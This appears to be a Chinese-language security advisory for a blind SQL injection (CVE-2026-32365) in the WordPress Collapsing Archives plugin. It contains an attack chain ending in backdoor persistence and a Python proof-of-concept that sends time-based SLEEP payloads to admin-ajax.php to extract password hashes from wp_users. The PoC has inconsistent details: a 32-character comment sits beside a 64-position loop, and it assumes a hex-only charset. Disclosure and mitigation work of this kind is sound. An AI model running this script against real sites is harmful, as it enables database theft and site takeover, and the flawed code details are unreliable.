WordPress Collapsing Archives插件SQL注入漏洞（CVE-2026-32365）

漏洞信息

漏洞编号

CVE-2026-32365

漏洞类型

SQL注入

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Collapsing Archives插件（robfelty/collapsing-archives）

漏洞概述

CVE-2026-32365是WordPress平台Collapsing Archives插件中的一个高危安全漏洞，CVSS评分达到8.5分。该漏洞属于SQL注入类型中的盲注（Blind SQL Injection），存在于插件对用户输入的特殊元素处理不当，未能正确转义或参数化SQL查询语句。攻击者可通过构造恶意的SQL payload，利用插件的归档列表展示功能，在不需要高权限的情况下执行任意SQL命令。此漏洞影响Collapsing Archives插件3.0.7及以下所有版本，攻击者可借此获取数据库中的敏感信息，包括用户凭证、站点配置数据等。鉴于该漏洞可通过网络远程利用且攻击复杂度较低，建议受影响的用户立即采取修复措施。

技术细节

Collapsing Archives插件在处理归档列表查询时，直接将用户可控的参数拼接到SQL查询语句中，未进行充分的输入验证和转义处理。漏洞点主要位于插件的数据库查询函数中，当用户请求归档数据时，插件会根据URL参数或POST数据构建SQL查询。由于缺少参数化查询或预编译语句，攻击者可在参数中注入恶意SQL代码。在盲注场景下，攻击者无法直接获取查询结果，但可通过条件判断（如IF语句）和时间延迟（如SLEEP函数）来推断数据库内容。例如，通过构造类似 AND (SELECT CASE WHEN (条件) THEN SLEEP(5) ELSE 0 END) 的payload，根据响应时间判断条件真假，从而逐字符提取数据。此攻击方式对数据库类型和版本有一定要求，但针对MySQL等常见数据库均有效。攻击者最终可提取管理员密码哈希、API密钥等敏感数据。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网站使用的WordPress版本，并确认Collapsing Archives插件（版本≤3.0.7）已安装且启用。通过检查插件目录或发送测试请求确认漏洞存在。

STEP 2

步骤2：构造恶意请求

攻击者构造包含SQL注入payload的HTTP请求，通常针对admin-ajax.php端点或插件的其他AJAX处理函数。payload中包含条件判断语句和时间延迟函数。

STEP 3

步骤3：盲注数据提取

通过反复发送带有不同条件的请求，根据响应时间差异（时间盲注）或页面内容差异（布尔盲注），逐字符推断数据库中的敏感信息，如用户密码哈希。

STEP 4

步骤4：密码破解

获取到密码哈希后，攻击者使用离线暴力破解或彩虹表攻击获取明文密码。如果管理员在多个站点使用相同密码，攻击者可尝试横向移动。

STEP 5

步骤5：权限提升与持久化

使用获取的管理员凭证登录WordPress后台，通过插件上传或主题编辑功能实现远程代码执行，并在系统中建立持久化后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

# CVE-2026-32365 Blind SQL Injection PoC
# Target: WordPress site with Collapsing Archives plugin <= 3.0.7

target_url = "http://target-site.com/wp-admin/admin-ajax.php"

def blind_sql_inject(payload):
    """Execute blind SQL injection and return result based on response time"""
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    data = {
        "action": "collapsing_archives",
        "custom_field": payload
    }
    
    start_time = time.time()
    response = requests.post(target_url, data=data, headers=headers, timeout=30)
    elapsed_time = time.time() - start_time
    
    return elapsed_time > 5  # True if time-based blind injection successful

def extract_char(position, ascii_value):
    """Extract a single character from database using blind injection"""
    # Payload to test if ASCII value at position matches
    payload = f"test' AND (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT user_pass FROM wp_users LIMIT 1),{position},1))={ascii_value}) THEN SLEEP(5) ELSE 0 END)-- -"
    
    return blind_sql_inject(payload)

def extract_admin_password():
    """Extract admin password hash using blind SQL injection"""
    password_hash = ""
    charset = "0123456789abcdef"
    
    for pos in range(1, 65):  # MD5 hash is 32 characters
        for char in charset:
            ascii_val = ord(char)
            if extract_char(pos, ascii_val):
                password_hash += char
                print(f"Position {pos}: {char} (Hash: {password_hash})")
                break
    
    return password_hash

# Example: Test if vulnerability exists
test_payload = "test' AND SLEEP(5)-- -"
if blind_sql_inject(test_payload):
    print("[+] Vulnerability confirmed! Blind SQL Injection is possible.")
    print("[*] Extracting admin password hash...")
    # admin_hash = extract_admin_password()
    # print(f"[+] Admin password hash: {admin_hash}")
else:
    print("[-] Target may not be vulnerable or plugin not installed.")

影响范围

Collapsing Archives插件 <= 3.0.7

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1）禁用Collapsing Archives插件或使用替代插件；2）在Web服务器层面配置URL过滤规则，拦截包含SQL注入特征的请求（如包含UNION、SELECT、SLEEP等关键词的请求）；3）临时限制非管理员用户对相关功能的访问；4）启用数据库查询日志监控，及时发现异常查询行为；5）考虑使用云WAF服务提供商的SQL注入防护规则。建议尽快升级到插件官方发布的安全修复版本。